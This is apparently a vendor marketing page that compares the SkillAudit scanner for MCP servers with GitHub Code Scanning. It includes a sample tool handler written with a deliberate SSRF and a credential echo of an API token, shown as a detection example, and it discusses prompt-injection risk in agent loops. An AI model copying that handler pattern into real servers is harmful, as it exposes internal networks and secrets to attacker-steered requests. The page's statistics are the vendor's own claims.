GitHub Code Scanning alternative
A GitHub Code Scanning alternative for MCP servers and Claude skills
GitHub Code Scanning is great at the job it was built for: run CodeQL's standard query pack against your repo on every push, surface findings in the Security tab and inline on PR diffs, and gate the merge on configured severity. For a traditional web service it's nearly free, well-integrated, and credible. For a Claude skill or MCP server, the standard pack misses the things that actually matter — because the taint sources and threat models that pack was tuned for don't match the MCP tool-handler surface. SkillAudit fills that gap with rules built specifically for server.tool(...) handlers, plus an LLM-assisted prompt-injection probe that no SAST tool runs.
TL;DR
GitHub Code Scanning runs CodeQL on your repo. CodeQL's standard pack models the OWASP-shaped web-app world: HTTP request parameters as taint sources, SQL drivers / shells / file IO as taint sinks. That model fires on classic controllers and request handlers; it doesn't fire on the MCP idiom — server.tool('fetch_url', async ({url}) => fetch(url)) — because the standard pack doesn't recognise tool arguments as a taint source in the same way it recognises req.query.x. Worse, prompt-injection susceptibility isn't a CodeQL category at all; the standard pack has no concept of "untrusted content flows into a tool response that the LLM will treat as instructions." SkillAudit reads every server.tool(...) / @app.tool handler with MCP-shaped rules — SSRF, command-exec, credential echo, permission scope — and runs an LLM-assisted prompt-injection red-team. Output: a single A–F grade and a public report card. We've graded 101 of the most-installed MCP servers this way. 50% shipped SSRF, 38% had credential-handling findings, 19% earned an A. Keep GitHub Code Scanning on your repo for the OWASP coverage; add SkillAudit for the MCP surface.
Why teams look for a GitHub Code Scanning alternative for Claude skills and MCP servers
GitHub Code Scanning isn't bad. It's free for public repos, the integration with the Security tab and PR review is well-designed, and CodeQL's standard pack is one of the most mature SAST query libraries in the world. Teams running Code Scanning on a backend service get genuine coverage — SQL injection, path traversal, deserialization, hardcoded secrets, dangerous regex, the well-trodden OWASP categories.
But ICP buyers and authors keep landing on three structural reasons CodeQL's standard pack underfires on MCP code:
- The taint sources are wrong. CodeQL's standard pack identifies taint sources by language and framework —
req.queryandreq.paramsin Express,request.GETin Django,HttpServletRequestin Java servlets. The MCP idiom isserver.tool("name", schema, async (args) => ...); theargsobject is the source, but the standard pack doesn't know@modelcontextprotocol/sdk'sserver.toolregistration or FastMCP's@app.tooldecorator are taint origins. As a result, an SSRF in a tool handler — the most common finding in our 101-repo corpus — is invisible to a stock CodeQL run. Could a security team write a custom CodeQL query that modelsserver.toolas a source? In theory, yes. In practice nobody has shipped a maintained, public MCP query pack for GHCS, authoring CodeQL is a specialised skill, and the result wouldn't include the prompt-injection probe at all. - Prompt injection isn't a CodeQL category. CodeQL is taint analysis: known sources, known sinks, dataflow between them. Prompt-injection susceptibility is a different kind of property — it asks "given this handler, is there a path where untrusted content (a webpage the agent fetched, a Slack message it summarised, a GitHub issue it triaged) ends up in a tool response that the LLM will read back as part of its prompt context?" That's a question about the semantics of an LLM agent loop, not a graph traversal between tagged AST nodes. SkillAudit answers it by extracting each handler's body and asking Claude Haiku 4.5 to red-team it; CodeQL has no equivalent.
- No public per-repo grade. GHCS findings live in the repo owner's Security tab, behind GitHub auth. They're not buyer-readable. A team evaluating whether to install someone else's MCP can't view that team's GHCS results — there's no public surface. SkillAudit's report card is at a stable public URL; the grade is on the README badge; the install decision becomes a glance-able comparison.
Three buyer-side reasons we hear:
- You audit MCPs you don't own. A team installing Stripe's, Cloudflare's, or AWS's MCP server can't see those vendors' GHCS results. SkillAudit's public board includes them.
- The standard CodeQL pack didn't fire on your MCP, but you know there's an SSRF. The query just doesn't model
server.toolarguments as a source. SkillAudit's rules do. - Your team needs a prompt-injection signal. CodeQL has no concept of untrusted-content-as-instruction. SkillAudit treats it as a first-class axis.
How SkillAudit is different
SkillAudit is a static + LLM-assisted scanner built specifically for the MCP tool-handler surface. The rules know about the MCP idiom: every server.tool registration, every @app.tool decorator across the nine MCP language SDKs (typescript, python, ruby, kotlin, java, csharp, swift, rust, go), every handler body, every fetch() / http.request() / urllib.urlopen() call inside a handler. Then it runs the seven checks that compose into a single A–F grade:
- SSRF — does any tool handler call
fetch()with an LLM-controlled URL? - Command-exec —
shell=True,execSync,os.system,subprocess.Popenwith shell-interpreted strings inside a handler? - Prompt injection — the LLM-assisted red-team that SAST can't run.
- Credential echo —
process.env.Xoros.environ['X']on a handler return path? - Permission scope — does the OAuth scope / Linux capability / API permission requested match what the handlers actually need?
- Maintenance — last commit, open issues, advisory feed.
- Client compatibility — non-standard transports, protocol-version mismatches.
Output is a single A–F grade plus a public report card at a stable URL with file paths and finding counts. Run time: roughly 60 seconds. Adoption is paste-a-URL or a GitHub Action that gates the merge on minimum grade — the same merge-gate model GHCS already uses, just running our rule pack instead of the stock CodeQL pack.
Side by side
| GitHub Code Scanning (CodeQL standard pack) | SkillAudit | |
|---|---|---|
| Scanner type | SAST — CodeQL taint analysis with the standard query pack | SAST + LLM-assisted; pattern-based for MCP idioms |
| Threat model | OWASP Top 10 in traditional web/server code | LLM-mediated attacker via tool handlers — MCP-specific |
| What's modelled as a taint source | req.query, req.params, HttpServletRequest, @RequestBody, etc. | Tool arguments — every server.tool / @app.tool handler argument |
SSRF in fetch(args.url) tool handlers | Stock pack misses — args aren't tagged as source | Yes — first-class MCP rule |
| Command-exec in tool handlers | Catches some when spawn(...) is the shape it knows; misses MCP-shaped variants | Yes — handler-aware rule fires on execSync, os.system, shell=True |
| Prompt-injection susceptibility | Not a category — CodeQL doesn't model LLM-as-instruction-channel | Yes — Claude Haiku 4.5 red-teams every extracted handler |
Credential echo from process.env | Catches some hardcoded-secret patterns; misses env-var-on-handler-return-path | First-class axis; flags env vars in handler return paths |
| Permission-scope review | Not in scope | Yes — flags org-wide OAuth scopes when single-repo would do |
| Maintenance / repo signals | Not in scope | Last commit, open issues, advisory feed; per-axis |
| Client compatibility | Not in scope | Yes — non-standard transports + protocol-version mismatches |
| Findings location | Repo Security tab + PR diff (GitHub-native) | Public per-repo report card at a stable URL |
| Buyer-side public grade | No — findings are private to the repo owner | Yes — public board; embeddable badge for authors |
| Custom MCP query pack | Possible in theory; nobody has shipped a maintained one | Built-in — the rule pack is the product |
| Pricing | Free for public repos; included in GitHub Advanced Security for private repos | Free: 3 audits/mo public · Pro $19/mo · Team $99/mo |
The shape of the gap, in 30 seconds
Here is the canonical SSRF in an MCP tool handler. CodeQL's standard pack does not fire on it — the taint source isn't modelled. SkillAudit fires on it because the rule knows what an MCP tool registration looks like:
// Clean under GitHub Code Scanning (standard CodeQL pack — args
// not modelled as a taint source on server.tool registrations).
// F-grade SSRF under SkillAudit.
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { z } from "zod";
const server = new McpServer({ name: "fetch-helper", version: "1.0" });
server.tool(
"fetch_url",
"Fetch the contents of any URL",
{ url: z.string() },
async ({ url }) => {
const res = await fetch(url); // SSRF
const body = await res.text();
// and a credential echo on the same return path
return { content: [{ type: "text",
text: `${body}\n[token: ${process.env.API_TOKEN}]`
}] };
}
);
server.connect(new StdioServerTransport());
Two findings in eight lines: SSRF on fetch(url) with an LLM-controlled argument, and credential echo (process.env.API_TOKEN) reaching a tool response the LLM will quote back in its own output. Neither fires on a stock CodeQL run, because the standard pack's source/sink configuration was tuned for HTTP request handlers, not MCP tool registrations. Both are routine catches in our rule pack — the same rules that produce the public grades in our corpus. None of this is a knock on CodeQL's engine — it's the right engine, on the wrong query pack, for this code.
What the data says
We ran SkillAudit against 101 of the most-installed Claude skills and MCP servers — the full live board is public and growing. The corpus includes vendor-official releases (Stripe, PayPal, MongoDB, Redis, Cloudflare, AWS, Azure, GCP, Heroku, Notion, Snowflake, Pinecone, Couchbase, Auth0, Resend, Brave, Vectara, Meilisearch, plus Anthropic's nine official MCP language SDKs), popular indie frameworks (FastMCP, mcp-use, mcp-agent), and community releases.
Results: 50% (50/101) shipped SSRF findings, 38% (38/101) had credential-handling findings, 10% (10/101) had command-exec findings, only 19% (19/101) earned an A. Full grade distribution: 19 A · 30 C · 10 D · 42 F. Methodology and per-repo grades are in our research post: The state of MCP server security, 2026.
The relevant point for the GHCS comparison: most of the F-grade vendor-official repos in the corpus — Cloudflare's mcp-server-cloudflare, Heroku's heroku-mcp-server, Stripe's agent-toolkit, MongoDB's mongodb-mcp-server, the GitHub github-mcp-server itself — are GitHub-hosted, often with Code Scanning enabled, and the standard CodeQL pack is firing zero on the SSRF / credential-echo / prompt-injection findings SkillAudit reports. That's the model gap: CodeQL is doing what it does, it's just not tuned for the MCP idiom. SkillAudit is.
When GitHub Code Scanning is still right
GHCS earns its keep, even on the same repo. Specifically:
- Your MCP server wraps a traditional web service. If the repo also exposes a regular HTTP API, CodeQL's standard pack catches the OWASP-shaped issues in that surface — SQL injection in your
/usersendpoint, path traversal in your file-upload route. SkillAudit doesn't replace that; it covers the MCP wrapper, not the underlying app. - You want GitHub-native PR comments. Code Scanning surfaces findings inline on the PR diff, which is genuinely better UX than checking an external dashboard. A team optimising for "the merge gate is the gate" should keep GHCS in the loop.
- You're a public-repo team and the price is "free." CodeQL on public repos is included; it's hard to argue against running it. SkillAudit is also free at small volume on public repos — the two stack.
- Hardcoded-secrets and obvious deserialization patterns. CodeQL's standard pack is mature on those; if you're worried about a gpg key in source or an unsafe
pickle.loads, GHCS catches it. - You're already running Advanced Security. Don't rip it out. The Security tab is GitHub's native surface for code review at scale; SkillAudit doesn't compete with that workflow, it adds a public per-repo grade alongside it.
The most useful framing: GHCS is the SAST that runs on every push to catch the OWASP-shaped patterns CodeQL's standard pack knows about; SkillAudit is the SAST that runs on every push to catch the MCP-shaped patterns CodeQL's standard pack doesn't. Same engine class, different rule pack, different threat model. They don't conflict.
Workflow
Three steps to add SkillAudit on top of your existing Code Scanning setup:
- Keep Code Scanning on. The standard CodeQL pack is doing real work on the OWASP-shaped surface. Don't disable it.
- Add SkillAudit as a second job in CI. A separate workflow that runs the SkillAudit GitHub Action on push (Pro plan) or on every plugin install (gate via
.claude/plugins.lockchanges). The two checks run in parallel; the merge gate fails if either fails. - Pair the public grade with the private findings. GHCS findings stay in your Security tab; SkillAudit's grade goes on the public board and the README badge. A buyer evaluating whether to install your MCP can read the grade in five seconds; your security team can drill into both feeds in the Security tab and the SkillAudit report card.
Indie developers shipping MCP servers can run SkillAudit at zero cost — the free tier covers three audits a month on public repos, and the public report card is shareable on your README the same day you publish. Buyers gate adoption with the public grade; authors embed the badge to win listings.
Try SkillAudit on your repo — free
Paste any GitHub URL on the home page, get a graded report card in 60 seconds. Your repo joins the public board only if you opt in; private repos audit through a single-repo OAuth scope, never org-wide.